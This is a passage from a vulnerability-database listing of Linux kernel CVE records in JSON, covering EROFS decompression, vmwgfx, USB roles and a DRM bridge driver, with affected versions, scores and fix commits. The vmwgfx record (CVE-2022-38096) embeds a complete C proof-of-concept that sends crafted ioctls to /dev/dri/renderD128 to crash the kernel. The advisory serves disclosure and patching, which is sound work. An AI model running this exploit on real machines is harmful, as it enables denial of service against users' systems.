"url": "https://git.kernel.org/stable/c/a0180e940cf1aefa7d516e20b259ad34f7a8b379"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/77cbc04a1a8610e303a0e0d74f2676667876a184"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/33bf23c9940dbd3a22aad7f0cda4c84ed5701847"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f36d200a80a3ca025532ed60dd1ac21b620e14ae"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/bffc4cc334c5bb31ded54bc3cfd651735a3cb79e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3c12466b6b7bf1e56f9b32c366a3d83d87afb4de"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/erofs/decompressor.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "9ff2d260b25df6fe1341a79113d88fecf6bd553e",
"status": "affected",
"version": "0ffd71bcc3a03ebb3551661a36052488369c4de9",
"versionType": "git"
},
{
"lessThan": "a0180e940cf1aefa7d516e20b259ad34f7a8b379",
"status": "affected",
"version": "0ffd71bcc3a03ebb3551661a36052488369c4de9",
"versionType": "git"
},
{
"lessThan": "77cbc04a1a8610e303a0e0d74f2676667876a184",
"status": "affected",
"version": "0ffd71bcc3a03ebb3551661a36052488369c4de9",
"versionType": "git"
},
{
"lessThan": "33bf23c9940dbd3a22aad7f0cda4c84ed5701847",
"status": "affected",
"version": "0ffd71bcc3a03ebb3551661a36052488369c4de9",
"versionType": "git"
},
{
"lessThan": "f36d200a80a3ca025532ed60dd1ac21b620e14ae",
"status": "affected",
"version": "0ffd71bcc3a03ebb3551661a36052488369c4de9",
"versionType": "git"
},
{
"lessThan": "bffc4cc334c5bb31ded54bc3cfd651735a3cb79e",
"status": "affected",
"version": "0ffd71bcc3a03ebb3551661a36052488369c4de9",
"versionType": "git"
},
{
"lessThan": "3c12466b6b7bf1e56f9b32c366a3d83d87afb4de",
"status": "affected",
"version": "0ffd71bcc3a03ebb3551661a36052488369c4de9",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/erofs/decompressor.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.3"
},
{
"lessThan": "5.3",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.285",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.211",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.150",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.76",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.15",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.285",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.211",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.150",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.76",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.15",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.3",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "5.3",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nerofs: fix lz4 inplace decompression\n\nCurrently EROFS can map another compressed buffer for inplace\ndecompression, that was used to handle the cases that some pages of\ncompressed data are actually not in-place I/O.\n\nHowever, like most simple LZ77 algorithms, LZ4 expects the compressed\ndata is arranged at the end of the decompressed buffer and it\nexplicitly uses memmove() to handle overlapping:\n __________________________________________________________\n |_ direction of decompression --\u003e ____ |_ compressed data _|\n\nAlthough EROFS arranges compressed data like this, it typically maps two\nindividual virtual buffers so the relative order is uncertain.\nPreviously, it was hardly observed since LZ4 only uses memmove() for\nshort overlapped literals and x86/arm64 memmove implementations seem to\ncompletely cover it up and they don\u0027t have this issue. Juhyung reported\nthat EROFS data corruption can be found on a new Intel x86 processor.\nAfter some analysis, it seems that recent x86 processors with the new\nFSRM feature expose this issue with \"rep movsb\".\n\nLet\u0027s strictly use the decompressed buffer for lz4 inplace\ndecompression for now. Later, as an useful improvement, we could try\nto tie up these two buffers together in the correct order."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T07:38:00.214Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/9ff2d260b25df6fe1341a79113d88fecf6bd553e"
},
{
"url": "https://git.kernel.org/stable/c/a0180e940cf1aefa7d516e20b259ad34f7a8b379"
},
{
"url": "https://git.kernel.org/stable/c/77cbc04a1a8610e303a0e0d74f2676667876a184"
},
{
"url": "https://git.kernel.org/stable/c/33bf23c9940dbd3a22aad7f0cda4c84ed5701847"
},
{
"url": "https://git.kernel.org/stable/c/f36d200a80a3ca025532ed60dd1ac21b620e14ae"
},
{
"url": "https://git.kernel.org/stable/c/bffc4cc334c5bb31ded54bc3cfd651735a3cb79e"
},
{
"url": "https://git.kernel.org/stable/c/3c12466b6b7bf1e56f9b32c366a3d83d87afb4de"
}
],
"title": "erofs: fix lz4 inplace decompression",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52497",
"datePublished": "2024-02-29T15:52:13.428Z",
"dateReserved": "2024-02-20T12:30:33.305Z",
"dateUpdated": "2025-05-04T07:38:00.214Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-38096 (GCVE-0-2022-38096)
Vulnerability from cvelistv5
Published
2022-09-09 14:39
Modified
2024-09-16 19:46
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- CWE-476 - NULL Pointer Dereference
Summary
A NULL pointer dereference vulnerability was found in vmwgfx driver in drivers/gpu/vmxgfx/vmxgfx_execbuf.c in GPU component of Linux kernel with device file '/dev/dri/renderD128 (or Dxxx)'. This flaw allows a local attacker with a user account on the system to gain privilege, causing a denial of service(DoS).
References
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "5.14",
"status": "affected",
"version": "v4.20-rc1",
"versionType": "custom"
}
]
}
],
"metrics": [
{
"other": {
"content": {
"id": "CVE-2022-38096",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-26T13:45:25.191519Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-26T13:49:29.690Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-03T10:45:52.802Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=2073"
},
{
"name": "[debian-lts-announce] 20240625 [SECURITY] [DLA 3842-1] linux-5.10 security update",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "kernel",
"vendor": "Linux",
"versions": [
{
"lessThan": "5.13.0-52*",
"status": "affected",
"version": "v4.20-rc1",
"versionType": "custom"
}
]
}
],
"credits": [
{
"lang": "en",
"value": "Ziming Zhang(ezrakiez@gmail.com) from Ant Group Light-Year Security Lab"
}
],
"datePublic": "2022-09-06T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "A NULL pointer dereference vulnerability was found in vmwgfx driver in drivers/gpu/vmxgfx/vmxgfx_execbuf.c in GPU component of Linux kernel with device file \u0027/dev/dri/renderD128 (or Dxxx)\u0027. This flaw allows a local attacker with a user account on the system to gain privilege, causing a denial of service(DoS)."
}
],
"exploits": [
{
"lang": "en",
"value": "#include \u003cstdio.h\u003e\n#include \u003cstring.h\u003e\n#include \u003cunistd.h\u003e\n#include \u003cerrno.h\u003e\n\n#include \u003clinux/if_tun.h\u003e\n#include \u003cnet/if.h\u003e\n#include \u003csys/ioctl.h\u003e\n#include \u003csys/types.h\u003e\n#include \u003csys/stat.h\u003e\n#include \u003cfcntl.h\u003e\n#include \u003cpthread.h\u003e\n#include \u003csys/socket.h\u003e\n#include \u003cstring.h\u003e\n#include \u003cunistd.h\u003e\n#include \u003cstdlib.h\u003e\n#include \u003csys/ioctl.h\u003e\n#include \u003cerrno.h\u003e\n#include \u003cstdio.h\u003e\n#include \u003cfcntl.h\u003e\n#include \u003cpthread.h\u003e\n#include \u003cstdio.h\u003e\n#include \u003csys/types.h\u003e\n#include \u003cstdint.h\u003e\n#include \u003cnetinet/ip.h\u003e\n#include \u003csys/resource.h\u003e\n#include \u003csys/syscall.h\u003e\n#include \u003climits.h\u003e\n#include \u003csys/mman.h\u003e\n\n#include \u003clinux/fs.h\u003e\nint fd = 0;\ntypedef struct mixer\n{\n\tint index;\n\tint fd;\n\tchar *msg;\n}mixer_t;\n\nstruct drm_vmw_surface_create_req {\n\t__u32 flags;\n\t__u32 format;\n\t__u32 mip_levels[6];\n\t__u64 size_addr;\n\t__s32 shareable;\n\t__s32 scanout;\n};\nstruct drm_vmw_execbuf_arg {\n\t__u64 commands;\n\t__u32 command_size;\n\t__u32 throttle_us;\n\t__u64 fence_rep;\n\t__u32 version;\n\t__u32 flags;\n\t__u32 context_handle;\n\t__s32 imported_fence_fd;\n};\nvoid init(){\nif ((fd = open(\"/dev/dri/renderD128\", O_RDWR)) == -1)\n {\n printf(\"open tun failed: %s\\n\", strerror(errno));\n return -1;\n }\n \n}\nvoid poc(int sid){ \nint cmd[0x1000]={0};\ncmd[0]=1165;\ncmd[1]=0x50;\ncmd[2]=0x0;\ncmd[3]=0x0;\ncmd[4]=-1;\nstruct drm_vmw_execbuf_arg arg={0};\n\targ.commands=cmd;\n\targ.command_size=0x100;\n\targ.version=2; \n\targ.context_handle=sid;\n if (ioctl(fd, 0x4028644C, \u0026arg) == -1)\n {\n printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n return -1;\n }\n\n}\nint alloc_context(){\n\nint arg[0x10]={0};\narg[0]=0;\narg[1]=0x100;\n\nif (ioctl(fd, 0x80086447, \u0026arg) == -1)\n {\n printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n return -1;\n }\n return arg[0]; \n}\n\nint alloc_bo(){\n\nint arg[0x10]={0};\narg[0]=0x10000;\nif (ioctl(fd, 0xC0186441, \u0026arg) == -1)\n {\n printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n return -1;\n }\n return arg[2]; \n}\n\nint create_surface(){\nint buf[0x100]={0};\nbuf[0]=64;\nbuf[1]=64;\nbuf[2]=64;\n\nstruct drm_vmw_surface_create_req arg={0};\narg.flags=0;\narg.format=2;\narg.mip_levels[0]=1;\narg.size_addr=buf;\narg.shareable=0;\narg.scanout=0x10;\n\nif (ioctl(fd, 0xC0306449, \u0026arg) == -1)\n {\n printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n return -1;\n }\nreturn arg.flags;\n}\nint main(int ac, char **argv)\n{\ninit();\nint cid=alloc_context(); \n printf(\"%d\",cid); \n poc(cid); \n \n}"
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-476",
"description": "CWE-476 NULL Pointer Dereference",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-06-25T21:08:05.642043",
"orgId": "cb8f1db9-b4b1-487b-a760-f65c4f368d8e",
"shortName": "Anolis"
},
"references": [
{
"url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=2073"
},
{
"name": "[debian-lts-announce] 20240625 [SECURITY] [DLA 3842-1] linux-5.10 security update",
"tags": [
"mailing-list"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"source": {
"defect": [
"https://bugzilla.openanolis.cn/show_bug.cgi?id=2073"
],
"discovery": "INTERNAL"
},
"title": "There is a NULL pointer vulnerability in vmwgfx driver",
"x_generator": {
"engine": "Vulnogram 0.0.9"
}
}
},
"cveMetadata": {
"assignerOrgId": "cb8f1db9-b4b1-487b-a760-f65c4f368d8e",
"assignerShortName": "Anolis",
"cveId": "CVE-2022-38096",
"datePublished": "2022-09-09T14:39:51.163117Z",
"dateReserved": "2022-09-07T00:00:00",
"dateUpdated": "2024-09-16T19:46:43.355Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26747 (GCVE-0-2024-26747)
Vulnerability from cvelistv5
Published
2024-04-03 17:00
Modified
2025-05-07 19:59
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
usb: roles: fix NULL pointer issue when put module's reference
In current design, usb role class driver will get usb_role_switch parent's
module reference after the user get usb_role_switch device and put the
reference after the user put the usb_role_switch device. However, the
parent device of usb_role_switch may be removed before the user put the
usb_role_switch. If so, then, NULL pointer issue will be met when the user
put the parent module's reference.
This will save the module pointer in structure of usb_role_switch. Then,
we don't need to find module by iterating long relations.
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 5c54fcac9a9de559b444ac63ec3cd82f1d157a0b Version: 5c54fcac9a9de559b444ac63ec3cd82f1d157a0b Version: 5c54fcac9a9de559b444ac63ec3cd82f1d157a0b Version: 5c54fcac9a9de559b444ac63ec3cd82f1d157a0b Version: 5c54fcac9a9de559b444ac63ec3cd82f1d157a0b Version: 5c54fcac9a9de559b444ac63ec3cd82f1d157a0b Version: 7b169e33a3bc9040e06988b2bc15e83d2af80358 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-26747",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-05-07T19:59:47.248619Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-476",
"description": "CWE-476 NULL Pointer Dereference",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-05-07T19:59:49.971Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:14:13.305Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e279bf8e51893e1fe160b3d8126ef2dd00f661e1"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ef982fc41055fcebb361a92288d3225783d12913"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0158216805ca7e498d07de38840d2732166ae5fa"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4b45829440b1b208948b39cc71f77a37a2536734"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/01f82de440f2ab07c259b7573371e1c42e5565db"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1c9be13846c0b2abc2480602f8ef421360e1ad9e"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/usb/roles/class.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "e279bf8e51893e1fe160b3d8126ef2dd00f661e1",
"status": "affected",
"version": "5c54fcac9a9de559b444ac63ec3cd82f1d157a0b",
"versionType": "git"
},
{
"lessThan": "ef982fc41055fcebb361a92288d3225783d12913",
"status": "affected",
"version": "5c54fcac9a9de559b444ac63ec3cd82f1d157a0b",
"versionType": "git"
},
{
"lessThan": "0158216805ca7e498d07de38840d2732166ae5fa",
"status": "affected",
"version": "5c54fcac9a9de559b444ac63ec3cd82f1d157a0b",
"versionType": "git"
},
{
"lessThan": "4b45829440b1b208948b39cc71f77a37a2536734",
"status": "affected",
"version": "5c54fcac9a9de559b444ac63ec3cd82f1d157a0b",
"versionType": "git"
},
{
"lessThan": "01f82de440f2ab07c259b7573371e1c42e5565db",
"status": "affected",
"version": "5c54fcac9a9de559b444ac63ec3cd82f1d157a0b",
"versionType": "git"
},
{
"lessThan": "1c9be13846c0b2abc2480602f8ef421360e1ad9e",
"status": "affected",
"version": "5c54fcac9a9de559b444ac63ec3cd82f1d157a0b",
"versionType": "git"
},
{
"status": "affected",
"version": "7b169e33a3bc9040e06988b2bc15e83d2af80358",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/usb/roles/class.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.19"
},
{
"lessThan": "4.19",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.211",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.150",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.80",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.19",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.7",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.211",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.150",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.80",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.19",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.7",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.18.12",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: roles: fix NULL pointer issue when put module\u0027s reference\n\nIn current design, usb role class driver will get usb_role_switch parent\u0027s\nmodule reference after the user get usb_role_switch device and put the\nreference after the user put the usb_role_switch device. However, the\nparent device of usb_role_switch may be removed before the user put the\nusb_role_switch. If so, then, NULL pointer issue will be met when the user\nput the parent module\u0027s reference.\n\nThis will save the module pointer in structure of usb_role_switch. Then,\nwe don\u0027t need to find module by iterating long relations."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T12:54:39.831Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/e279bf8e51893e1fe160b3d8126ef2dd00f661e1"
},
{
"url": "https://git.kernel.org/stable/c/ef982fc41055fcebb361a92288d3225783d12913"
},
{
"url": "https://git.kernel.org/stable/c/0158216805ca7e498d07de38840d2732166ae5fa"
},
{
"url": "https://git.kernel.org/stable/c/4b45829440b1b208948b39cc71f77a37a2536734"
},
{
"url": "https://git.kernel.org/stable/c/01f82de440f2ab07c259b7573371e1c42e5565db"
},
{
"url": "https://git.kernel.org/stable/c/1c9be13846c0b2abc2480602f8ef421360e1ad9e"
}
],
"title": "usb: roles: fix NULL pointer issue when put module\u0027s reference",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26747",
"datePublished": "2024-04-03T17:00:34.066Z",
"dateReserved": "2024-02-19T14:20:24.168Z",
"dateUpdated": "2025-05-07T19:59:49.971Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-52694 (GCVE-0-2023-52694)
Vulnerability from cvelistv5
Published
2024-05-17 14:27
Modified
2025-05-04 07:41
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
drm/bridge: tpd12s015: Drop buggy __exit annotation for remove function
With tpd12s015_remove() marked with __exit this function is discarded
when the driver is compiled as a built-in. The result is that when the
driver unbinds there is no cleanup done which results in resource
leakage or worse.
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: cff5e6f7e83f6271ed75972e9a2920e2c7f62d6c Version: cff5e6f7e83f6271ed75972e9a2920e2c7f62d6c Version: cff5e6f7e83f6271ed75972e9a2920e2c7f62d6c Version: cff5e6f7e83f6271ed75972e9a2920e2c7f62d6c Version: cff5e6f7e83f6271ed75972e9a2920e2c7f62d6c Version: cff5e6f7e83f6271ed75972e9a2920e2c7f62d6c |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-52694",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-20T14:12:21.936619Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:23:16.179Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T23:11:34.931Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/53926e2a39629702f7f809d614b3ca89c2478205"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/08ccff6ece35f08e8107e975903c370d849089e5"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/81f1bd85960b7a089a91e679ff7cd2524390bbf1"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a8657406e12aa10412134622c58977ac657f16d2"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e00ec5901954d85b39b5f10f94e60ab9af463eb1"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ce3e112e7ae854249d8755906acc5f27e1542114"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00016.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/bridge/ti-tpd12s015.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "53926e2a39629702f7f809d614b3ca89c2478205",
"status": "affected",
"version": "cff5e6f7e83f6271ed75972e9a2920e2c7f62d6c",
"versionType": "git"
},
{
"lessThan": "08ccff6ece35f08e8107e975903c370d849089e5",
"status": "affected",
"version": "cff5e6f7e83f6271ed75972e9a2920e2c7f62d6c",
"versionType": "git"
},
{
"lessThan": "81f1bd85960b7a089a91e679ff7cd2524390bbf1",
"status": "affected",
"version": "cff5e6f7e83f6271ed75972e9a2920e2c7f62d6c",
"versionType": "git"
},
{
"lessThan": "a8657406e12aa10412134622c58977ac657f16d2",
"status": "affected",
"version": "cff5e6f7e83f6271ed75972e9a2920e2c7f62d6c",
"versionType": "git"
},
{
"lessThan": "e00ec5901954d85b39b5f10f94e60ab9af463eb1",
"status": "affected",
"version": "cff5e6f7e83f6271ed75972e9a2920e2c7f62d6c",
"versionType": "git"
},
{
"lessThan": "ce3e112e7ae854249d8755906acc5f27e1542114",
"status": "affected",
"version": "cff5e6f7e83f6271ed75972e9a2920e2c7f62d6c",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/bridge/ti-tpd12s015.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.7"
},
{
"lessThan": "5.7",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.209",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.148",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.75",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.14",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.2",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.209",
"versionStartIncluding": "5.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.148",
"versionStartIncluding": "5.7",
"vulnerable": true
},
{
